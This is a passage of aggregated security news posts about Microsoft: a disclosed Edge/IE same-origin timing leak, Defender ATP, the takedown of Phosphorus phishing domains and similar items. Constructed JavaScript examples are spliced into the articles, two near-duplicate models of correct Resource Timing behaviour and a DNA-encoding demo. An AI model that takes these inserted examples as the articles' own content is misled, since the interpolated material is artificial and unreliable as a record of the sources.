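The leak above comes down to what a browser writes into the name field of a redirected cross-origin resource entry. The following is an added example, not code from the article or from James Lee's POC: a small Node.js model of how a spec-conformant Resource Timing implementation builds that entry, keeping name fixed to the URL the page requested and hiding redirect timings unless every hop passes the Timing-Allow-Origin check. The origins, URLs, response chains and timing numbers are constructed for illustration.

```javascript
// Added example: model of spec-conformant Resource Timing entry construction.
// Origins, URLs and timings are constructed; they are not from the article.

// Serialized origin ("scheme://host[:port]") of a URL.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.host}`;
}

// Timing-Allow-Origin check, approximating the Resource Timing spec:
// a response passes if it is same-origin with the document, or if its
// Timing-Allow-Origin header is "*" or lists the document's origin exactly.
function timingAllowCheck(documentOrigin, response) {
  if (originOf(response.url) === documentOrigin) return true;
  const tao = response.headers["timing-allow-origin"];
  if (!tao) return false;
  return tao
    .split(",")
    .map(v => v.trim())
    .some(v => v === "*" || v === documentOrigin);
}

// Build a PerformanceResourceTiming-like entry for one fetch.
// `responses` is the whole chain: every redirect hop, then the final response,
// each shaped as { url, status, headers, startTime, responseEnd }.
function buildResourceEntry(documentOrigin, requestUrl, responses) {
  const first = responses[0];
  const last = responses[responses.length - 1];
  // The check must pass for EVERY hop; otherwise redirect timings stay hidden
  // and startTime collapses to the fetchStart of the final request.
  const allowed = responses.every(r => timingAllowCheck(documentOrigin, r));
  const redirected = responses.length > 1;

  const entry = {
    // The spec fixes name to the URL that was requested; it must not change
    // when the fetch is redirected. The browsers in the article exposed the
    // post-redirect URL here instead, which is the information leak.
    name: requestUrl,
    entryType: "resource",
    startTime: allowed ? first.startTime : last.startTime,
    fetchStart: last.startTime,
    responseEnd: last.responseEnd,
    redirectStart: 0,
    redirectEnd: 0,
  };
  if (allowed && redirected) {
    entry.redirectStart = first.startTime;
    entry.redirectEnd = responses[responses.length - 2].responseEnd;
  }
  entry.duration = entry.responseEnd - entry.startTime;
  return entry;
}

// Constructed scenario mirroring the article: a page on its own origin
// requests a URL that 302-redirects to a cross-origin search results page.
const DOC_ORIGIN = "https://attack1.example";
const CROSS_ORIGIN_CHAIN = [
  { url: "https://attack1.example/go", status: 302,
    headers: { location: "https://search.example/?q=secret" },
    startTime: 10, responseEnd: 40 },
  { url: "https://search.example/?q=secret", status: 200,
    headers: {}, startTime: 45, responseEnd: 120 },
];

// Same shape of request, but the redirect stays on the document's own origin.
const SAME_ORIGIN_CHAIN = [
  { url: "https://attack1.example/go", status: 302,
    headers: { location: "https://attack1.example/landing" },
    startTime: 10, responseEnd: 40 },
  { url: "https://attack1.example/landing", status: 200,
    headers: {}, startTime: 45, responseEnd: 120 },
];

function demo() {
  const crossOrigin = buildResourceEntry(DOC_ORIGIN, "https://attack1.example/go", CROSS_ORIGIN_CHAIN);
  const sameOrigin = buildResourceEntry(DOC_ORIGIN, "https://attack1.example/go", SAME_ORIGIN_CHAIN);
  return { crossOrigin, sameOrigin };
}

console.log(JSON.stringify(demo(), null, 2));
```

In the cross-origin case the entry never mentions search.example at all; only the requested URL, fetchStart and responseEnd are exposed, which is the behaviour the vulnerable browsers failed to honour.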

The attacker now has access to any information stored in the URL, even if it is supposed to be hidden. Examples of vulnerable information that might be stored in the URL include cookies, sessionIDs, usernames, passwords, and OAUTH tokens, either in plaintext or hash form. OAUTH is a way of authorizing third party applications to login to users’ online accounts, and has a history of being abused. Any sensitive information included in the URL of a website could be collected using these vulnerabilities.

Putting these vulnerabilities in perspective, recall the failed attack scenario. If the attacker could bypass this same-origin policy and gain access to confidential information exchanged between user and “trustedbank.com,” the user’s online banking account could be compromised. The attacker would be able to impersonate the client and gain access to the client’s personal information for online authentication, which could have devastating effects.

How to safely browse the web

This vulnerability is potentially very serious, since it can expose aspects of confidential browsing sessions to malicious servers. There is currently no information on when Microsoft will provide a fix for this threat, making this a high-risk scenario for end users. One solution would be to stop using Microsoft Edge and Internet Explorer until the bug is fixed.

The Trend Micro™ Deep Security™ platform and Vulnerability Protection can protect user systems from any threats that may target the vulnerability detailed above via the following DPI rules:

  • 1009640 – Microsoft Edge And Internet Explorer Same Origin Policy Bypass Vulnerabilities

The post Microsoft Edge and Internet Explorer Zero-Days Allow Access to Confidential Session Data appeared first on TrendLabs Security Intelligence Blog.

Microsoft adds tamper protection to Microsoft Defender ATP

Microsoft has added a new tamper protection feature to the Microsoft Defender ATP (formerly Windows Defender ATP) antimalware solution. When turned on, it should prevent malicious apps and actors from disabling the antimalware solution or some of its key security features.

Foiling often-used tactics

Malware developers are forever looking for ways to make their wares “invisible” to users, AV/antimalware software and malware analysts. They pursue the first goal by disguising the malware as a legitimate document … More

The post Microsoft adds tamper protection to Microsoft Defender ATP appeared first on Help Net Security.

Tripwire Patch Priority Index for March 2019

Tripwire’s March 2019 Patch Priority Index (PPI) brings together the top vulnerabilities for March 2019. First on the patch priority list this month are patches for Microsoft’s Browser, Scripting Engine and VBScript. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Security Feature Bypass and Remote Code Execution vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for March 2019 appeared first on The State of Security.


Microsoft’s Collaboration On Google’s Chromium Brings a New Feature To Chrome

Remember when Microsoft announced they'd be switching to Google's open source Chromium browser for developing their own Edge browser? At the time Google announced "We look forward to working with Microsoft and the web standards community to advance the open web, support user choice, and deliver great browsing experiences." Now MSPoweruser reports Microsoft has indeed started collaborating on Chromium -- making suggestions like caret browsing and a native high-contrast mode -- and at least one of Microsoft's suggestions is already coming to Chrome. It looks like there is one feature that Chromium approved which will be making its way to Chrome soon. According to a new bug filing on Chromium (via Techdows), Google is working on bringing text suggestions for hardware keyboards to Chrome. The feature will allow users to get suggestions as they type, which is currently available on Windows 10 and in Microsoft Edge. Google has just started working on the feature and has set the priority to 2, which suggests that it should be available sooner rather than later.

Read more of this story at Slashdot.

Security Affairs: Expert disclosed two Zero-Day flaws in Microsoft browsers

The 20-year-old security researcher James Lee publicly disclosed details and proof-of-concept exploits for two zero-day vulnerabilities in Microsoft web browsers.

The researcher opted to disclose the flaws after the tech giant allegedly failed to address the zero-day issues he had reported privately.
He reported the issues to Microsoft ten months ago, but the company did not respond to his responsible disclosure.

One of the flaws affects the latest version of the Edge browser; both flaws could be exploited by a remote attacker to bypass the same-origin policy in the victim’s web browser.

The Same Origin Policy (SOP) is a security mechanism implemented in modern browsers. The basic idea behind SOP is that JavaScript from one origin should not be able to access the properties of a page from another origin. A SOP bypass occurs when sitea.com is somehow able to access the properties of siteb.com, such as cookies, location or response content.

Microsoft browser zero-day

The zero-day flaw discovered by James Lee, who shared technical details with The Hacker News, could be exploited by attackers to set up a malicious website to perform universal cross-site scripting (UXSS) attacks against any domain visited using the vulnerable Microsoft web browsers.

The attacker just needs to trick victims into visiting a malicious website created to steal the victim’s sensitive data (e.g. login session, cookies) from other sites visited in the same browser.

“The issue is within Resource Timing Entries in Microsoft Browsers which inappropriately leak Cross-Origin URLs after redirection,” Lee told The Hacker News in an email.

Lee also released proof-of-concept (PoC) exploits for both vulnerabilities.

My friends at The Hacker News have tested and confirmed both zero-day flaws against the latest versions of Internet Explorer and Edge running on a fully patched Windows 10 operating system.

The availability of the PoC exploit code could allow threat actors to exploit both zero-day vulnerabilities to target Microsoft users.

While waiting for a fix, users could switch to other web browsers such as Chrome or Firefox.
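To make the SOP rule and Lee's one-line description concrete, here is an added JavaScript model (not code from the Security Affairs post or from Lee's PoC) of what a browser may expose in a resource timing entry after a cross-origin redirect: the entry is named after the URL the page itself requested, and redirect timings appear only if every hop in the chain opts in with a Timing-Allow-Origin header. The document origin, the redirect chain and its header values are constructed for the example.

```javascript
// Added example, not from the original article or the PoC: a model of the checks a
// browser applies before exposing resource timing data to a page, plus an audit
// helper a defender can run over entries to spot a cross-origin URL leak.

// Two URLs share an origin only when scheme, host and port all match.
// The URL parser normalises default ports, so "https://a.example:443" equals "https://a.example".
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA);
  const b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// Timing-Allow-Origin check for one response in the chain. Same-origin responses
// always pass; a cross-origin response passes only if it lists "*" or the exact
// document origin. Header names are assumed to be lower-cased by the fetch layer.
function timingAllowCheck(response, documentOrigin) {
  if (sameOrigin(response.url, documentOrigin)) return true;
  const tao = response.headers["timing-allow-origin"];
  if (!tao) return false;
  return tao.split(",").map((v) => v.trim()).some((v) => v === "*" || v === documentOrigin);
}

// Build the entry the page is allowed to see for a fetch that went through `chain`
// (first element = the request the page made, last element = the final response).
// `name` is always the requested URL, never the redirect target, so the page cannot
// learn where a cross-origin redirect landed. Redirect timings are released only
// when every hop passed the timing allow check; otherwise they are zeroed.
function buildTimingEntry(chain, documentOrigin) {
  const first = chain[0];
  const last = chain[chain.length - 1];
  const allowed = chain.every((r) => timingAllowCheck(r, documentOrigin));
  const entry = {
    name: first.url,
    entryType: "resource",
    startTime: first.startTime,
    responseEnd: last.endTime,
    duration: last.endTime - first.startTime,
    redirectStart: 0,
    redirectEnd: 0,
  };
  if (allowed && chain.length > 1) {
    entry.redirectStart = first.startTime;
    entry.redirectEnd = last.startTime;
  }
  return entry;
}

// Defender-side audit: does any string field of an entry name a URL outside the
// document's origin? A hardened browser should never produce such an entry.
function exposesCrossOriginUrl(entry, documentOrigin) {
  return Object.values(entry).some((v) => {
    if (typeof v !== "string") return false;
    try {
      return !sameOrigin(v, documentOrigin);
    } catch {
      return false; // not a URL (e.g. "resource"), so nothing leaked
    }
  });
}

// Constructed scenario: the page on sitea.example requests /go, which redirects to a
// cross-origin URL that carries a session-bound query string. No hop sends
// Timing-Allow-Origin, so the page must learn neither the target nor the redirect timing.
const documentOrigin = "https://sitea.example";
const redirectChain = [
  { url: "https://sitea.example/go", status: 302, headers: {}, startTime: 10, endTime: 40 },
  {
    url: "https://siteb.example/account?session=CONSTRUCTED_TOKEN",
    status: 200,
    headers: {},
    startTime: 40,
    endTime: 90,
  },
];

const entry = buildTimingEntry(redirectChain, documentOrigin);
console.log(entry);
console.log("leaks cross-origin URL:", exposesCrossOriginUrl(entry, documentOrigin));
```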

Pierluigi Paganini

(SecurityAffairs – Microsoft browsers, zero-day)

The post Expert disclosed two Zero-Day flaws in Microsoft browsers appeared first on Security Affairs.
Unpatched Zero-Days in Microsoft Edge and IE Browsers Disclosed Publicly

Exclusive — A security researcher today publicly disclosed details and proof-of-concept exploits for two 'unpatched' zero-day vulnerabilities in Microsoft's web browsers after the company allegedly failed to respond to his responsible private disclosure. Both unpatched vulnerabilities—one of which affects the latest version of Microsoft Internet Explorer and the other the latest Edge

E Hacking News – Latest Hacker News and IT Security News: 99 Iranian websites used for hacking were seized by Microsoft

According to a report by the Associated Press, Microsoft has seized 99 Iranian websites that were allegedly being used to steal information and launch cyber attacks. The report also said that Microsoft had been tracking the group of hackers since 2013.

The hackers were targeting people in the Middle East to steal sensitive information, using malicious websites disguised as Microsoft, LinkedIn, Outlook and Windows products. Microsoft confirmed in a court filing that the group was stealing information from reporters, activists and political figures, including people “protesting oppressive regimes”.

The hackers are from Iran, but the Tehran government has denied any hacking activity on its part, as it has also denied previous hacking allegations.

Allison Wikoff, a security researcher at Atlanta-based SecureWorks, told the Associated Press that in her observation it is one of the “more active Iranian threat groups”. She added that Microsoft protects against fake domains by analyzing their traffic, a practice popularly called “sinkholing”. Microsoft previously used sinkholing to seize fake domains set up by Russian hackers in 2016.

E Hacking News – Latest Hacker News and IT Security News: US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites

Microsoft has been legally granted control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus.

In order to prevent the sites from being used to carry out cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to take charge of these websites tied to the group, which is also known as Charming Kitten, Ajax Security Team and APT 35.

Phosphorus relies on spear-phishing to break into individuals' private accounts. The group uses social engineering to lure individuals into clicking on links, at times sent from fake accounts that appear to belong to familiar contacts. The link delivers malicious software which gives Phosphorus access to the victim's computer systems.

Basically, it performs malicious activity to gain access to sensitive data stored on the computer systems of government agencies and businesses.

Putting the matter into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East."

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt wrote in his blog post.

Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."

As Windows 10 19H1 Update Approaches, Microsoft Says Version 1809 is Now Ready For ‘Broad Deployment’

We're now very close to the next semi-annual update for Windows 10, but Microsoft has just announced today that version 1809, released last fall, is now the recommended version for all users. From a report: This is a new milestone in the troubled history of this major release, as Microsoft had to pause its public rollout after discovering a serious file deletion bug in October. "Based on the data and the feedback we've received from consumers, OEMs, ISVs, partners, and commercial customers, Windows 10, version 1809 has transitioned to broad deployment," wrote John Wilcox, Windows as a service evangelist on the Windows IT Pro blog today. We're now a little more than four months removed from Microsoft's re-released Windows 10 version 1803, and Microsoft previously admitted that it would be more cautious during the public rollout. According to AdDuplex's latest survey of more than 100,000 Windows 10 PCs, only 26.4% of them were running version 1809 in March.

Read more of this story at Slashdot.

Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

By Uzair Amir

Microsoft has announced that it has seized some key websites that Iranian hackers used for stealing sensitive information from unsuspecting users in the US as well as for launching cyber attacks. Reportedly, Microsoft has seized 99 websites belonging to an Iranian hacker group that is known by many names including Phosphorus, Charming Kitten and APT […]

This is a post from HackRead.com Read the original post: Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

Microsoft Memo Bans April Fools’ Day Pranks

Everyone hates April Fools' Day, and Microsoft is taking a stand against its own corporate pranks. From a report: Microsoft's marketing chief Chris Capossela has warned all employees to not participate in the process of annoying hoaxes on Monday. In an internal memo, Capossela explains that "data tells us these stunts have limited positive impact and can actually result in unwanted news cycles." He encourages all teams inside Microsoft not to do any public-facing April Fools' Day stunts. "I appreciate that people may have devoted time and resources to these activities, but I believe we have more to lose than gain by attempting to be funny on this one day," says Capossela. That's probably a safe bet, as we've seen some April Fools' Day pranks backfire spectacularly in the past. Google was forced to apologize for adding Despicable Me minions into emails and muting threads a few years ago, causing email havoc for Gmail users. Microsoft has also participated in many April Fools' Day pranks over the years, including an MS-DOS mobile for Windows Phone and Google insults.

Read more of this story at Slashdot.

Microsoft announces Windows Defender ATP for Mac

Microsoft’s Windows Defender ATP coming soon to Mac

Microsoft has announced the Windows Defender Advanced Threat Protection (ATP) enterprise platform for macOS. Windows Defender ATP is now called Microsoft Defender Advanced Threat Protection (ATP), and the Mac client offers full antivirus and threat protection along with the ability to launch full, quick, and custom scans.

“Today, we’re announcing our advances in cross-platform next-generation protection and endpoint detection and response coverage with a new Microsoft solution for Mac. Core components of our unified endpoint security platform, including the new Threat & Vulnerability Management also announced today, will now be available for Mac devices,” Microsoft said in a blog post.

“We’ve been working closely with industry partners to enable Windows Defender Advanced Threat Protection (ATP) customers to protect their non-Windows devices while keeping a centralized “single pane of glass” experience. Now we are going a step further by adding our own solution to the options, starting with a limited preview today.”

According to Microsoft, “the user interface brings a similar experience to what customers have today on Windows 10 devices.” The antivirus software is compatible with devices running macOS Mojave, macOS High Sierra, and macOS Sierra.

During the limited preview period, Microsoft Defender ATP for Mac will allow end users to review and perform configuration of their protection, including:

  • Running scans, including full, quick, and custom path scans (we recommend quick scans in nearly all scenarios)
  • Reviewing detected threats
  • Taking actions on threats, including quarantine, remove, or allow
  • Disabling or enabling real-time protection, cloud-delivered protection, and automatic sample submission
  • Adding exclusions for files and paths
  • Managing notifications when threats are found
  • Manually checking for security intelligence updates

Further, Microsoft has also included its AutoUpdate software to ensure that the app remains up to date on macOS and stays properly connected to the cloud.

Currently, Defender ATP for Mac is only available as a limited preview for Microsoft’s business customers, so that they can test the antivirus protection in setups that include both Windows and Mac machines.

Mac customers can apply for Microsoft Defender ATP preview here.

Source: Microsoft

The post Microsoft announces Windows Defender ATP for Mac appeared first on TechWorm.

Microsoft demonstrates first fully automated DNA data storage with a ‘hello’

Microsoft successfully automates DNA-based data storage system

Researchers from Microsoft and the University of Washington have been working since 2016 on developing one of the first complete DNA-based data storage systems, which could dramatically shrink the space needed to store digital data. The storage system will have the random-access readability and error correction protocols that would be required for real-world applications.

Microsoft on Thursday announced that a team of researchers has successfully executed the first fully automated system in which data can be stored in manufactured DNA, retrieved, and converted back into digital data.

The researchers published their proof-of-concept system in a new paper in Nature Scientific Reports journal on March 21.

In a simple proof-of-concept test, the research team was able to successfully encode the word “hello” in snippets of fabricated DNA and convert it back to digital data using a fully automated end-to-end system. It took the researchers 21 hours to convert five bytes of data.

“We have conviction that DNA molecules are good candidates for data storage. But we are, at heart, computer architects. We really want to figure out what a future computer could look like,” Luis Ceze, a professor at UW’s Paul G. Allen School of Computer Science and Engineering said. “What’s exciting for us here is that it’s one step toward showing a computer system that has a molecular component and an electronic component.”

The method for DNA data storage is similar to the way the DNA in our cells encodes genetic information. The encoding software converts the zeroes and ones that make up a digital file into sequences of the four basic building blocks of DNA – adenine, guanine, cytosine and thymine. These “letters” of DNA code (A, T, C and G) stand in for the 1s and 0s of a computer’s binary code that digital machines can read.

For instance, “Hello” could be coded into the chemical string TCAACATGATGAGTA. To store it, the device first encoded the bits (1s and 0s) into DNA sequences (As, Cs, Ts and Gs), synthesized the DNA, and stored it as a liquid. The stored DNA was then read by a DNA sequencer and, finally, the sequences were translated back into bits by the decoding software.
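The bits-to-bases step described above, as an added JavaScript example that is not the Microsoft/UW team's code: a straightforward two-bits-per-base mapping (so five bytes of “hello” become 20 bases, unlike the article's 15-base string, which comes from the team's own coding scheme) with a one-byte checksum appended, so that a misread base is detected before the decoded data is trusted. The mapping, the checksum and the sample text are all constructed for illustration; the real system uses a more sophisticated error-correcting code.

```javascript
// Added example, not the researchers' encoding: a simplified bits-to-bases codec
// with 00=A, 01=C, 10=G, 11=T and a one-byte checksum for error detection.
const BASES = ["A", "C", "G", "T"];
const BASE_INDEX = { A: 0, C: 1, G: 2, T: 3 };

// Encode bytes into a DNA string: four bases per byte, most significant bit pair first.
function bytesToDna(bytes) {
  let dna = "";
  for (const b of bytes) {
    for (let shift = 6; shift >= 0; shift -= 2) {
      dna += BASES[(b >> shift) & 0b11];
    }
  }
  return dna;
}

// Decode a DNA string back into bytes; rejects lengths that are not whole bytes
// and any symbol that is not one of the four bases.
function dnaToBytes(dna) {
  if (dna.length % 4 !== 0) throw new Error("DNA length must be a multiple of 4");
  const out = new Uint8Array(dna.length / 4);
  for (let i = 0; i < dna.length; i++) {
    const v = BASE_INDEX[dna[i]];
    if (v === undefined) throw new Error(`invalid base ${dna[i]} at position ${i}`);
    out[i >> 2] = (out[i >> 2] << 2) | v;
  }
  return out;
}

// Constructed checksum: byte sum mod 256. A single substituted base changes one
// byte by a non-zero multiple of a power of four, which is never 0 mod 256, so
// any single-base read error in the payload is caught.
function checksum(bytes) {
  let sum = 0;
  for (const b of bytes) sum = (sum + b) & 0xff;
  return sum;
}

// "Write" step: payload bytes followed by the checksum byte, as one strand.
function storeText(text) {
  const payload = new TextEncoder().encode(text);
  return bytesToDna(payload) + bytesToDna([checksum(payload)]);
}

// "Read" step: decode, verify the checksum, and return the text, or null when the
// strand is malformed or the checksum does not match (a detected read error).
function retrieveText(dna) {
  let bytes;
  try {
    bytes = dnaToBytes(dna);
  } catch {
    return null;
  }
  if (bytes.length < 1) return null;
  const payload = bytes.subarray(0, bytes.length - 1);
  if (checksum(payload) !== bytes[bytes.length - 1]) return null;
  return new TextDecoder().decode(payload);
}

const strand = storeText("hello"); // constructed sample, the same word the article uses
console.log(strand, retrieveText(strand));
```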

“Our ultimate goal is to put a system into production that, to the end user, looks very much like any other cloud storage service — bits are sent to a datacenter and stored there and then they just appear when the customer wants them,” said principal researcher Karin Strauss, a UW affiliate associate professor in the Paul G. Allen School of Computer Science and Engineering and a senior researcher at Microsoft. “To do that, we needed to prove that this is practical from an automation perspective.”

To date, the system has managed to store one gigabyte of data in DNA, besting the team’s previous world record of 200 MB. The stored data includes cat photographs, great literary works, pop videos and archival recordings, all of which were retrieved without errors, the researchers said.

However, the drawback is that writing data to DNA is expensive and extremely slow, because of the slow chemical reactions involved in synthesizing DNA, and getting the data back requires sequencing the DNA and decoding the files back into 0s and 1s.

Information is stored in synthetic DNA molecules created in a lab, not DNA from humans or other living things, and can be encrypted before it is sent to the system. While sophisticated machines such as synthesizers and sequencers already perform key parts of the process, many of the intermediate steps have until now required manual labor in the research lab. That wouldn’t be viable in a commercial setting, said Chris Takahashi, senior research scientist at the UW’s Paul G. Allen School of Computer Science & Engineering.

“You can’t have a bunch of people running around a datacenter with pipettes — it’s too prone to human error, it’s too costly and the footprint would be too large,” Takahashi added.

Microsoft believes that synthetic DNA could be the next big step forward in long-term data storage with ease. “We are definitely seeing a new kind of computer system being born here where you are using molecules to store data and electronics for control and processing. Putting them together holds some really interesting possibilities for the future,” said Ceze.

Source: Microsoft

The post Microsoft demonstrates first fully automated DNA data storage with a ‘hello’ appeared first on TechWorm.

TypeScript’s Quiet, Steady Rise Among Programming Languages

Microsoft's programming language TypeScript has become one of the most popular languages among developers, at least according to a report published by the analyst firm RedMonk this week. Wired: TypeScript jumped from number 16 to number 12, just behind Apple's programming language Swift in RedMonk's semiannual rankings, which were last published in August. Microsoft unveiled TypeScript in 2012, and while it hasn't grown as quickly as Swift -- which has grown faster than any other language, ever since RedMonk started compiling the rankings in 2011 -- TypeScript's own ascendance is impressive, given the sheer number of available programming languages. More and more applications these days use TypeScript. Google's programming framework Angular, the second most popular tool of its type according to data released last year by the startup NPM, is written in TypeScript. So is Vue, an increasingly popular framework finding a home both among smaller companies and tech giants like Alibaba. But RedMonk doesn't look at how many jobs are available for people skilled in a particular language, nor how many companies actually use the language. Instead, the firm tries to spot trends in developer interest by looking at how many projects on GitHub use certain languages, and how many questions are asked about those languages on the programmer Q&A site Stack Overflow. The idea is to get a sense of where the software development profession is heading.

Read more of this story at Slashdot.

Microsoft Says the FCC ‘Overstates’ Broadband Availability In the US

An anonymous reader quotes a report from Motherboard: Microsoft this week was the latest to highlight the U.S. government's terrible broadband mapping in a filing with the FCC, first spotted by journalist Wendy Davis. In it, Microsoft accuses the FCC of over-stating actual broadband availability and urges the agency to do better. "The Commission's broadband availability data, which underpins FCC Form 477 and the Commission's annual Section 706 report, appears to overstate the extent to which broadband is actually available throughout the nation," Microsoft said in the filing. "For example, in some areas the Commission's broadband availability data suggests that ISPs have reported significant broadband availability (25 Mbps down/3 Mbps up) while Microsoft's usage data indicates that only a small percentage of consumers actually access the Internet at broadband speeds in those areas," Microsoft said. Similar criticism has long plagued the agency. The FCC's broadband data is received via the form 477 data collected from ISPs. But ISPs have a vested interest in over-stating broadband availability to obscure the sector's competition problems, and the FCC historically hasn't worked very hard to independently verify whether this data is truly accurate. The FCC's methodology has long been criticized as well. As it currently stands, the agency declares an entire ZIP code as "served" with broadband if just one home in an entire census block has it. In its filing, Microsoft "suggested that the Commission's ongoing effort to more accurately measure broadband could be improved by drawing on the FCC's subscription data, along with other broadband data sets from third-parties such as Microsoft, to complement survey data submitted under the current rules."

Read more of this story at Slashdot.

Bromium: Application Isolation in the Spotlight

  • Two major announcements bring application isolation into the spotlight
  • Microsoft and HP elevate the importance of isolation in the endpoint security stack
  • Isolate risky browser activity, but don’t forget files are risky too

This week, two major announcements came out highlighting the need for application isolation in the endpoint security stack – HP DaaS Proactive Security and Microsoft Windows Defender extensions for Chrome and Firefox. The spotlight on application isolation is an excellent way to raise awareness for this technology, and I applaud HP and Microsoft for going all out with isolation as a way to boost endpoint security. Here is a closer look at what both announcements are highlighting.

Microsoft Defender Application Guard (WDAG)

Microsoft Windows Defender Application Guard (WDAG) was announced over a year ago; it introduced client virtualization on Windows. The initial release was designed to redirect untrusted (or not explicitly trusted) Edge browser activity into a VM. The end user would surf the web using Edge, and if they typed in a URL or were redirected to a site that was untrusted, the website would open in a separate instance of Edge running isolated inside a VM. The end user would thus have two instances of Edge running, and the protected instance was marked with a red background.

Everyone was excited when WDAG came out, as browsers continue to be a major attack vector, and we even wrote a blog supporting Microsoft entering the isolation market. As any security specialist will tell you, the safest way to stop malware is to keep end users from opening emails or surfing the web altogether. While true, this is clearly not practical, but isolation is the technology that can change the game. Unfortunately for Microsoft, it was not practical to expect users to abandon Chrome and Firefox for Edge. You win some and you lose some, and Microsoft did not win the browser market. BUT they also didn’t lose sight of the importance of isolating potentially risky browser activity, which brings us to their announcement this week.

Microsoft releases Windows Defender Application Guard for Chrome and Firefox

Microsoft WDAG now allows users to surf the web using their browser of choice. When a user types in or is redirected to an untrusted site, the Chrome or Firefox extension hands the website off to Edge, which is running inside a VM. WDAG is still about client virtualization aiming to isolate risky websites into a separate VM on the user’s PC, but now the user is not required to use Microsoft Edge as their default browser. Most of the end user’s browser activity will take place in their default browser; however, when the user encounters an untrusted site, they will access that website in an isolated instance of Edge. Welcome back to browser isolation, Microsoft, and thank you for validating the application isolation market!

The second announcement this week that validates application isolation was from HP.

HP DaaS Proactive Security

HP and Bromium have enjoyed a productive relationship for over two years, since HP launched HP Sure Click, which uses Bromium Secure isolation technology for hardware-enforced browser isolation. Our relationship continues to grow and evolve, and this week HP announced the next step – including Bromium Secure isolation for browsing and files in their HP DaaS Proactive Security powered by HP Sure Click Advance. This announcement further validates that major players in the hardware and software market are recognizing the need to move the responsibility for endpoint security away from the end user. Microsoft and HP are choosing to rely on application isolation as the way to prevent malware from invading Windows endpoints and spreading onto corporate networks.

Isolate Only Browsers?

While we applaud Microsoft’s decision to use isolation for surfing the web and for links that come in emails, there’s an obvious gap in their coverage. What about emails with attachments? And how about files that users download from the Internet? Browsers are indeed a major attack vector, but files are just as much of one. If you don’t think files are a threat, you might want to visit some of our latest Threat Intelligence posts below.

What do you think of this week’s announcements? Share your thoughts and questions in the comments section. Happy reading!

The post Application Isolation in the Spotlight appeared first on Bromium.

Microsoft Ships Antivirus For macOS as Windows Defender Becomes Microsoft Defender

Microsoft is bringing its Windows Defender anti-malware application to macOS -- and more platforms in the future -- as it expands the reach of its Defender Advanced Threat Protection (ATP) platform. From a report: To reflect the new cross-platform nature, the suite is also being renamed to Microsoft Defender ATP, with the individual clients being labelled "for Mac" or "for Windows." macOS malware is still something of a rarity, but it's not completely unheard of. Ransomware for the platform was found in 2016, and in-the-wild outbreaks of other malicious software continue to be found. Apple has integrated some malware protection into macOS, but we've heard from developers on the platform that Mac users aren't always very good at keeping their systems on the latest point release. Further reading: Microsoft launches previews of Windows Virtual Desktop and Defender ATP for Mac.

Read more of this story at Slashdot.

Microsoft Launch Application Guard Extension For FireFox and Chrome

Earlier, Microsoft introduced a dedicated Windows Defender browser extension for its browser Microsoft Edge with Windows 10. The extension, named

Microsoft Launch Application Guard Extension For FireFox and Chrome on Latest Hacking News.

Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE!

Microsoft's products are still a leading source of exploitable security vulnerabilities used by hackers, according to a report by the firm Recorded Future.

The post Report: with most exploited vuln of 2018, it’s really Really REALLY time to ditch IE! appeared first on The Security Ledger.


McAfee releases MVISION Cloud security solution for Microsoft Teams

McAfee, the device-to-cloud cybersecurity company, announced McAfee MVISION Cloud for Microsoft Teams, a comprehensive security and compliance integration for Teams. McAfee MVISION Cloud for Microsoft Teams is an extension to the already available comprehensive security solution that McAfee MVISION Cloud has for Microsoft Office 365. This solution nicely complements Team’s capabilities by using a frictionless API-based cloud-native approach that allows IT teams to seamlessly enforce data loss prevention (DLP) policies and collaboration controls, contextual access … More

The post McAfee releases MVISION Cloud security solution for Microsoft Teams appeared first on Help Net Security.

Google, Microsoft Work Together For a Year To Figure Out New Type of Windows Flaw

Google researcher James Forshaw discovered a new class of vulnerability in Windows before any bug had actually been exploited. The involved parts of the flaw "showed that there were all the basic elements to create a significant elevation of privilege attack, enabling any user program to open any file on the system, regardless of whether the user should have permission to do so," reports Ars Technica. Thankfully, Microsoft said that the flaw was never actually exposed in any public versions of Windows, but said that it will ensure future releases of Windows will not feature this class of elevation of privilege. Peter Bright explains in detail how the flaw works. Here's an excerpt from his report: The basic rule is simple enough: when a request to open a file is being made from user mode, the system should check that the user running the application that's trying to open the file has permission to access the file. The system does this by examining the file's access control list (ACL) and comparing it to the user's user ID and group memberships. However, if the request is being made from kernel mode, the permissions checks should be skipped. That's because the kernel in general needs free and unfettered access to every file. As well as this security check, there's a second distinction made: calls from user mode require strict parameter validation to ensure that any memory addresses being passed in to the function represent user memory rather than kernel memory. Calls from kernel mode don't need that same strict validation, since they're allowed to use kernel memory addresses. Accordingly, the kernel API used for opening files in NT's I/O Manager component looks to see if the caller is calling from user mode or kernel mode. Then the API passes this information on to the next layer of the system: the Object Manager, which examines the file name and figures out whether it corresponds to a local filesystem, a network filesystem, or somewhere else. 
